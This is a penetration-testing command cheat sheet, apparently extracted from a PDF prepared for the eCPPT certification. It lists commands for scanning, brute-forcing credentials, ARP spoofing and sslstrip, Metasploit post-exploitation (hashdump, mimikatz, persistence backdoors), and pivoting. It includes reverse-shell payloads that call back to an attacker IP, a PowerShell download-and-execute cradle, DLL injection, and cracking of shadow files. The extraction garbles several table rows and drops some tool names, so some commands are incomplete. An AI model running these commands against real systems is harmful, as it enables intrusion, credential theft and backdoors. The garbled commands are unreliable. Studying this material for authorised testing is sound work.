eCPPT FieldManual

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Last Updated: 2018

ertified ​
rofessional P
enetration T

Field Manual

By: kindredsec

Vital commands for the eCPPT exam,

as well as other Penetration Testing endeavors

Last Updated: 2018

Last Updated: 2018

This manual is designed as a repository for commonly used commands
used within the scope of the eCPPT Certification Exam. This is NOT a
detailed explanation on the mechanics of the attacks. Please refer to
elearnsecurity’s PTP course in order to understand the mechanics of
the various attacks referred to in this field manual. Also note that
these commands are not designed to suit everyone’s situation, nor are
the commands listed in this manual the only way to get the intended
results. For example, many of the commands listed in this manual have
the -
​v ​
(verbose) option set. This obviously is not required for the
associated attack to work, but I may personally feel that the verbose
option generates useful output for the user. Do not treat the commands
introduced in this manual as the “cookie-cutter” command usage. Take
the time to investigate the command and find what works best for you
as an attacker. Also, this manual is not all-inclusive. For every
command introduced, there is probably 100 more that do the exact same
thing. If you do not like the tools introduced in the manual, there
are likely a multitude of other options available.

Additionally, if you have little-to-no experience with Penetration

Testing, this manual will likely be very hard to comprehend. The
commands introduced are only given a brief explanation, and the
purpose of this manual is not to teach how to Penetration Test, but
rather to fortify Penetration Testing knowledge by serving as a
command repository. Also note that the commands in this manual are
tailored to the eCPPT; all the commands provided have in some way been
introduced in the PTPv5 course.

Most importantly, you as the reader should understand that I do not

advocate the use of any of the tools and techniques introduced in this
manual without the target’s consent. Being part of the penetration
testing community comes with an implied social contract that you will
NEVER use these tools against unwilling targets. Only use the tools
introduced in this manual against targets in which consent was
obtained, or against targets within a personal lab environment.

Finally, please note that I am in no way affiliated with

elearnsecurity or any of its partners.

Last Updated: 2018

Last Updated: 2018

Manual Layout:
The manual content will be introduced in a simple one-to-one mapping
via a 3-by-x table, with the left-most column representing the
command-type, the middle column representing the command and the right
column representing a quick explanation of the command.

The individual commands will have b

​olded ​
text and i
​talicized ​
● bolded ​
text indicates that part of the command will always remain
the same, regardless of environment.
● italicized t
​ext indicates user input, meaning that part of the
command will change depending on the environment.

Here is an example excerpt from the manual:

Performs a simple SYN scan

* nmap -
sS ​
target_ip_address of target IP address or IP
address range.

The middle column has the command structure and the right-most column
provides a generic description of the command. The left-most column is
designed to specify whether the command being introduced is CLI-based,
or something more specialized. An asterisk (​
) indicates that the
command being introduced is CLI-based, and will be executed within a
terminal. A plus sign (​
) indicates that the information being
introduced is something other than a CLI command, such as an SQL
payload. A pound symbol (​
) indicates that the information being
introduced is a Metasploit module or payload. The atmark symbol (​
indicates that the information being introduced is a meterpreter
command. A Dollar Sign (​
) indicates that the information being
introduced is a Windows Command or PowerShell Command.

Last Updated: 2018

Last Updated: 2018

Section 1: Network Security

Topic I: Domain Enumeration

* nslookup ​
target Performs a basic DNS Query.

* dig ​
domain M
​X Returns mails server within specified

* dig ​
domain N
​S Returns name servers within specified

* dig axfr @​
name_server domain Attempts a zone transfer from
specified name server.

* dnsrecon -d d
​omain -
​a --name_server ​
server Attempts a zone transfer from
specified name server.

* nmap -sU -p53 ​

network Scans for DNS servers within
specified network.

* dnsmap d
​omain Attempts to brute forces subdomains
of specified domain.

* perl -dns ​

domain -
​-dnsserver Automates domain enumeration.
server Performs zone transfer, subdomain
brute force, and more.

* d
​omain Automates domain enumeration.

Topic II: Nmap Basic Scanning

* nmap -sS ​
target Performs a simple SYN scan of target.

* nmap -sU ​
target Performs a UDP scan of target.

* nmap -sV ​
target Performs a version scan.

* nmap -O ​
target Performs an OS scan.

* hping3 -​
scan_type​--scan ​
ports​target Perform SYN scan for range of ports
with hping.

* nmap -Pn -sI -p p

​ort zombie_ip:port target Performs an idle scan.

* nmap -​
scan_type ​
-D d
​ecoy1,2… target Performs a scan using decoys.

* nmap -​
scan_type ​
(0-5) target Performs a scan with timing

* nmap -​
scan_type ​
-g​ s
​rc_port target Scans target from specified source

Last Updated: 2018

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* nmap -
​scan_type target ​
--disable-arp-ping Force nmap to use ICMP instead of ARP
when scanning local network.

Topic III: Idle Scan

* nmap -O -v z
​ombie_ip Determines if IP ID is incremental.

* nmap --script ipidseq t

​arget​-p ​
port Determines if IP ID is incremental.

* hping3 -S -r -p p
​ort zombie_ip Probes a zombie candidate.

* hping3 -a ​
zombie_ip ​
-S -p d
​st_port target Spoofs zombie’s IP and probes target.

* nmap -Pn -sI -p​

dst_port zombie_ip:src_port Performs Idle scan. (performs previous
target two steps simultaneously).

Topic IV: NetBIOS/SMB Enumeration

* nbtscan -v t
​arget Probes NetBIOS info of machine.

* smbclient -L t
​arget Lists shared resources of target.

* nmblookup -A t
​arget Displays system shares information.

* smbclient ​
/t​arget_share ​
-N Attempts to access a shared resources
with no credentials (null session).

* enum4linux t
​arget enumerates information on target
Windows system (shares, users, etc).

* rpc -N -U “” t
​arget Attempt to connect to RPC service with
no credentials.

* nmap --script=smb-brute ​
target Attempts to bruteforce SMB credentials
with nmap.

Topic V: SNMP Enumeration

* snmpwalk -c c
​_string ​
-v ​
version target Enumerates SNMP info of the given

* snmpwalk -c c
​_string ​
-v ​
version target OID Obtains SNMP info at specified OID.

* snmpset -c c
​_string ​-v ​
version target OID Changes the SNMP information at
value_type value specified OID.

* ls -l /usr/share/nmap/script | grep -i snmp Lists all SNMP-related nmap scripts.

Last Updated: 2018

Last Updated: 2018

* nmap -sU -p 161 --script=snmp-brute ​

target Attempts to brute force SNMP
community string.

Topic VI: Man-in-the-Middle Attacks

* echo 1 > /proc/sys/net/ipv4/ip_forward Permits attacker system to forward IP

packets (needed for MiTM attacks).

* macof -i ​
interface Performs a CAM Table Flood attack.

* arpspoof -i i
​nterface ​
-t ​
target1 ​
-r​target2 Performs an ARP Spoofing attack.

* bettercap -I i
​nterface ​
--no-spoofing Performs a basic ping sweep of
connected network.

* bettercap -I i
​nterface ​
-G ​
gateway ​
-T t
​arget Performs an ARP Spoofing attack.

* iptables -t nat -A PREROUTING -p tcp Sets up port redirection in order to

--destination-port 80 -j REDIRECT perform an sslstrip attack.
--to-ports 8080

* sslstrip -a -f -l 8080 -w ​
log Have ssltrip begin listening for

* bettercap -G g
​ateway ​
-T ​
target -
​-proxy-https use sslstrip attack with bettercap.

* python -i ​
interface -​-spoof --arp Performs a MiTM attack using
--dns --hsts --gateway g​ateway ​
--targets sslstrip2/sslstrip+

Topic VII: General Authentication Cracking

* medusa -h ​
target -
​M ​
protocol -
​U ​
usr_list ​
-P Attempts to crack credentials of
pwd_list network service when user unknown.

* medusa -h ​
target -
​M ​
protocol -
​u ​
usrname ​
-P Attempts to crack credentials of
pwd_list network service when user is known.

* hydra -l ​
​P ​
pwd_list service​
target Attempts to crack credentials of
network service when user is known

* patator ​
module h
target u
​ser=FILE0 Attempts to crack credentials of
password=FILE1 0=​
usr_list ​
pwd_list network service when user unknown.

* john --wordlist=​
word_list ​
--rules p
​wd_file Cracks hashes in specified local
file using a wordlist.

* john -i ​
pwd_file Cracks hashes in specified local
file using a pure brute force.

* john --show p
​wd_file Shows the results of a cracking

Last Updated: 2018

Last Updated: 2018

attempt on specified file.

* unshadow /etc/passwd /etc/shadow >​​

new_file Unshadows Linux system credentials.

Topic VII: NTLM/SMB Authentication Cracking

# auxiliary/server/capture/smb Configures attacker system to listen

for and log SMB connections.

* john --format=netlm ​
hash_file Cracks first portion of an LM/NTLM

* rcracki_mt -h ​
first_8bytes_hash -
​t 4 *.rti Cracks first portion of an LM/NTLM

* perl -file ​

hash_file -
​seed Cracks the remainder of an LM/NTLM
cracked_portion hash.

* perl -file h​ash_file ​

-seed Finds the proper casing of a cracked
cracked_passwd LM/NTLM hash.

# exploit/windows/smb/smb_relay Executes an SMB relay attack.

* msfvenom -p windows/meterpreter/reverse_tcp Create malicious file to force

attacker_ip ​
LPORT=​port -
​f exe -o target to callback to attacker.

# exploit/multi/handler Make attacking system listen for

incoming connections.

* python -h t
​arget -
​e ​
mal_exefile Attempts to obtain rev shell using
SMB Relay attack.

Topic VIII: Post-Exploitation

# post/windows/manage/migrate Make meterpreter migrate to another


@ migrate ​
pid Make meterpreter migrate to another

@ getsystem Attempts to elevate privileges.

# post/windows/gather/win_privs Determine privilege information.

# exploit/windows/local/bypassuac_vbs Attempts to bypass UAC in order to

escalate privileges.

@ use incognito Load extension used to impersonate

another user on Windows system.

Last Updated: 2018

Last Updated: 2018

@ list_tokens -u List available users to impersonate.

@ impersonate_token t
​oken Attempt to impersonate a user.

* gcc -m​
(32or64) ​
-o ​
​ource_code Compiles source code into a Linux

@ upload l
​ocal_file target_file_location Uploads a file onto target system.

@ hashdump Dump hashes in Windows SAM database.

# exploit/windows/smb/psexec Execute payload with obtained

Windows credentials.

@ load mimikatz Loads Mimikatz extension into

Meterpreter session.

@ wdigest Use Mimikatz to retrieve passwords.

@ run service_manager -l Lists running services on Windows.

@ run getgui -e Enable the RDP process on target.

$ net localgroup ​
”​user ​
/add Adds a user to a Windows group.

* rdesktop ​
target -
​u u
​ser ​
-p p
​assword Initiate an RDP session with target.

@ run persistence -A -X -i ​
time_int ​
-p p
​ort ​
-r Creates a persistent backdoor on a
attacker_ip target.

# exploit/multi/handler Make attacking system listen for

incoming connections.

$ net user ​
acc_name acc_pwd ​
/add Create a user on Windows system.

Topic IX: Pillaging/Data Harvesting

@ sysinfo Obtain basic system information

@ getuid Check the current user.

@ run post/windows/gather/ Lists all Meterpreter pillaging


@ run post/windows/gather/enum_services Obtain all running services on a

Windows machine.

$ wmic service get Obtain all running services on a

Caption,StartName,State,pathname Windows machine.

@ run post/windows/gather/enum_domains Determine what domains target is in.

$ net group “Domain Controllers” /domain Determine the domain controller of

Windows target’s domain

Last Updated: 2018

Last Updated: 2018

$ net user Displays users on Windows system.

@ run post/windows/gather/enum_ad_users Enumerates accounts in active domain.

$ net user /domain Enumerates accounts in active domain.

$ net localgroup Lists all local groups on system.

$ net localgroup ​
group_name Lists all users within group.

@ run post/windows/gather/enum_shares Lists all shared resources on system.

$ net share Lists all shared resources on system.

@ run scraper Runs pillage automation script.

@ run winenum Runs Windows pillage automation script.

@ run post/windows/gather/credentials Searches for credentials on a system.

@ run post/gather/enum_chrome Searches for credentials stored in

Google Chrome.

@ run post/windows/gather/enum_application Lists installed software on system.

Topic X: Internal Network Mapping and Pivoting

@ run arp_scanner -r ​
/​mask Perform an ARP scan of exploited
system’s network.

@ run post/multi/gather/ping_sweep Performs a basic ping sweep.

# route add ​
target_network target_mask Uses metasploit session as a route to
session# target internal network.

@ run autoroute -s t
CIDR Use session as route to target internal

# auxiliary/scanner/portscan/tcp Performs a basic SYN scan.

# auxiliary/server/socks4a Set up a SOCKS4 proxy in Metasploit.

@ portfwd add -l ​
local_port -
​p ​
remote_port Perform port forwarding via
-r ​
target meterpreter.

netsh advfirewall firewall add rule Opens a port on a Windows system; can
$ name=​
name d
in/out p
​rotocol=TCP be used with port forwarding to access
port a
​ction=allow internal systems.

$ netsh interface portproxy add v4tov4 Creates a port forwarding rule that
port l
ip directs traffic to another host; good
port ​
connectaddress=​ip for pivoting.

Last Updated: 2018

Last Updated: 2018

Section 2: PowerShell for Pentesters

Topic I: PowerShell Basics

$ Get-Help ​
cmdlet Get Usage information on the specified

$ Get-Command -Name s
​tring Searches for Commands related to given

$ Get-Process Obtains the running processes on


$ Select-String -Path ​
path -
​Pattern ​
string Searches for specified string within
the documents in given path.

$ Get-Content f
​ile Displays the contents of specified file

$ Get-Service s
​tring Displays services on the system (search
string optional)

$ Get-Module -ListAvailable Returns a list of available modules.

$ Import-Module ​
module_path Imports the specified module.

$ foreach (​
statement) {
​​body} PowerShell For Loop Syntax

Topic II: Download and Execution

iex (New-Object Downloads and executes the specified

$ Net.Webclient).DownloadString(‘ remote file.(Can also be done within PS
) shell).

Invoke-WebRequest -Uri t​arget -

​OutFile Obtains a file from a specified target
$ filename and saves it to the local filesystem.

var = ​
New-Object System.Xml.XmlDocument; Downloads and executes malicious
$ var.​
Load(“​remote_xml_file”); i
​ex PowerShell located within an XML
command.a.execute document.

$ Write-Host v
​ariable Output the contents of a variable.

Last Updated: 2018

Last Updated: 2018

* cat ​
file |
​ -
​iconv --to-code UTF-16LE | Converts PowerShell payload to a
base 64 properly encoded base64 string

$ powershell o
​ptions ​
-enc ​
base64_string executes a base64-encoded payload.

Topic III: PowerShell Recon

); $ip​
; ​
foreach ($port
in $ports) {try{$socket=New-Object
System.Net.Sockets.TcpClient($ip,$port);} Creates a Native portscan from a
$ catch {}; if ($socket -eq $null) {echo PowerShell hosts of a specified target.
$ip”:”$port” - Closed”;}else(echo (No additional modules need to be
$ip”:”$port” - Open”; $socket = $null;}} loaded for this to work.)

Invoke-Portscan -Hosts “​
” -ports Through the PowerSploit module,
$ “​
ports” performs a port scan on host range.

From the Posh-SecMod framework,

$ Invoke-ARPScan -CIDR n
/​cidr performs an ARP scan of specified

Topic IV: PowerShell Post-Exploitation

Invoke-PowerShellTcp -Reverse -IPAddress Using Nishang, creates a PowerShell

$ listen_ip ​
-Port l
​istener_port Reverse shell to specified listener.

Invoke-Mimkatz -DumpCreds Using Nishang, attempts to dump

$ cleartext credentials.

Import-Module ​
; Probes local system for potential
$ Invoke-AllChecks vulnerabilities.

Invoke-DLLInjection -ProcessID Injects a malicious DLL within the

$ target_process dll_file specified process (PowerSploit)

Section 3: Linux Exploitation

Last Updated: 2018

Last Updated: 2018

Topic I: Remote Shares (SMB) Enumeration

* showmount -e i
​p_address Shows available exports from the given

* rpcinfo -p i
​p_address Displays all the RPC-based services
running on given host.

* nmap --script smb-enum-shares ​

ip_address Given a host running the Samba service,
enumerates Samba-related information.

# auxiliary/scanner/smb/smb_login Obtains the usernames of a SMB server.

Lists the Samba shares located in

* smbmap -H ​
ip_address target host, as well as our access to

* smbclient -L i
​p_address Obtains basic information regarding SMB
and NetBIOS information.

* smbclient \\\\​
directory Attempts to access a SMB/Samba shared

* mount -t nfs i
:d​irectory Mounts a remote NFS-shared directory
mount_point ​
-o nolock for access.

mount -t cifs \\\\​

directory Mounts a remote SMB-shared directory
* mount_point for access. (Note: need the cifs-utils

rpcclient -U “” i
​p_address ​
-N \ As a guest, enumerate the SID of user
* --command=”lookupnames n
” on a system (Note; should be placed in
some sort of loop)

Topic II: SMTP Enumeration

* nmap --script smtp-commands i

​p_address ​
-p Enumerates what SMTP features are
25 enabled on an SMTP server.

* smtp-user-enum -M m
​ethod ​-U u
​ser_list ​
-t Attempts to enumerate the users that
ip_address exist on an SMTP server.

# auxiliary/scanner/smtp/smtp_enum Enumerates the users of a SMTP server.

Topic III: Local Network Enumeration

* cat /etc/resolv.conf Obtains the DNS servers used by system.

* ifconfig -a Lists current Network Interfaces.

Last Updated: 2018

Last Updated: 2018

* arp -a Lists local arp cache.

* netstat -auntp Lists TCP/UDP Listening Ports and


* ss -twurp Lists active connections and processes

* nmap -sT -p​

ports p
​ Tests outbound firewall rules

Topic IV: Network Exploitation

* hydra -L ​
user_list -
​P ​
password_list Performs a network authentication
service://target brute force attempt.

* hydra -l ​
user -
​p ​
password ​
-M s
​erver_list Attempts to use discovered
service credentials on other specified

* nmap --script smb-os-discovery -p445 Determines the version of Samba

ip_address running on specified system.

* searchsploit s
​earch Searches for exploits of specified

# Exploits the Username Map Script

exploit/multi/samba/usermap_script vulnerability, allowing attack to own
SMB server.

* python -c ‘import pty; pty.spawn(“​

shell”) ‘ Establishes a Pseudo TTY on remote
system, granting a shell prompt.

Exploits the Samba symlink

# auxiliary/admin/smb/samba_symlink_traversal vulnerability by creating a symbolic
link to rootfs.

+ /usr/share/webshells/perl/ A script used to create a reverse shell using perl.

* -u t
​arget -
​e cgi -r Attempts to find any cgi files on a
target web server.

* nmap --script http-shellshock --script-args Determines if a cgi file is

cgi-path ip_address -
​p ​
port vulnerable to the shellshock exploit.

* nmap --script ssl-heartbleed i

​p-address Determines if system is vulnerable to
the heartbleed exploit.

# auxiliary/scanner/ssl/openssl_heartbleed Module used to dump encrypted memory

contents from an ssl host.

# exploit/multi/misc/java_rmi_server Used to exploit the Java RMI


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Last Updated: 2018

# auxiliary/scanner/http/tomcat_mgr_login Performs password guessing against

Apache Tomcat servers.

A Java application that allows remote

+ /usr/share/laudanum/jsp/cmd.war command execution (Mostly used when
attacking Tomcat).

Topic IV: Linux Post-Exploitation

# post/linux/gather/enum_configs Collects all the most vital

configuration files on a system.

# post/linux/gather/enum_system Collects system information of a


* sudo -l Lists the sudo permissions of the

current user.

* unshadow ​
passwd_file shadow_file > output Creates a file that combines shadow
and passwd file for cracking

* python || ./ Attempts to obtain cleartext

credentials from memory.

* ldd ​
program Determines the shared libraries used
by a program.

* objdump -x p
​rogram ​
| g
​rep ​
RPATHorRUNPATH Determines whether a binary was
compiled with the RPATH or RUNPATH

msfvenom -a x64 -p Creates a malicious shared library

* linux/x64/shell_reverse_tcp object that establishes a remote shell
attacker_ip ​LPORT=​
port -
​f elf-so -o to an attacker system.

* perl -k ​
kernel Determines which vulnerabilities are
in the specified kernel/

* tdbdump ​
secrets_file Dumps Samba user information.

Last Updated: 2018

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